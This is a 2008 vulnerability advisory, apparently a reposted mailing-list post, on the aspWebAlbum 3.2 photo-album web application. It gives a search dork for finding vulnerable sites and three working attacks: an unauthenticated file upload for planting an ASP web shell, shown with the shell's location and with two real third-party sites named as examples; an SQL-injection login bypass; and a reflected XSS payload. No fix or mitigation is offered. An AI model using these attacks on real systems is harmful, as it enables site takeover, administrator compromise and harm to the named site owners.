Security Advisory: aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, CVE-2008-3664
  [ MDVSA-2008:185 ] python-django
  Zen Cart <= 1.3.8a SQL Injection
  SQL Injection vulnerabilities in myPHPNuke

From: Alemin_Krali Krali <alemin_(at)_windowslive.com>
Date: 07.09.2008
Subject: aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities

#################################################################################
#################


#-# Discovered bay Alemin_Krali <<<<<<<<====
#

#



#-# aspWebAlbum 3.2                                              #     #    ####   ##      ##
                                                                # #    #    #      # #    # #
#-# Script Download "http://www.fullrevolution.com"            #####   #    ###    # # # #
                                                              #     # #    #      #   #    #
#-# aspWebAlbum 3.2 Single Site License | $60.00 : )       #       # ### ####   #        #


#-# HomePage al3m.blogspot.com


#-# alemin@windowslive.com


#-# Dork ? : album.asp?pic= .jpg cat=




          #######################################################################
#
#                                       #
#              #                                       #
#              #
          # 1-Arbitrary File Upload Exploit [AspWebAlbum All Versions]          #
#
          #######################################################################
#
#

#

http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name!


and your shell adress:


http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp




ex:1

http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyb
erspy.asp


ex:2

http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/
Ablaze rally 9-24-06/pics/klasvayv.asp


          #######################################################################
#
#                                       #
#              #                                       #
#              #
          # 2-Admin Bypass     [AspWebAlbum 3.2]                                 #
#
          #######################################################################
#
#

#



http://site.com/path/album.asp?action=login


ASP/MS SQL Server login syntax


Username:'or'

Password:anything


          #######################################################################
#
#                                       #
#              #                                       #
#              #
          # 3-Xss Vulnerability [AspWebAlbum 3.2]                               #
#
          #######################################################################
#
#

#

http://site.com/album/album.asp?action=summary&message=<script>alert(
'xss')</script>&from=login


#################################################################################
################

_________________________________________________________________
Windows Live Messenger'эn iзin Ьcretsiz 30 Эfadeyi yьkle
http://www.livemessenger-emoticons.com/funfamily/tr-tr/

test server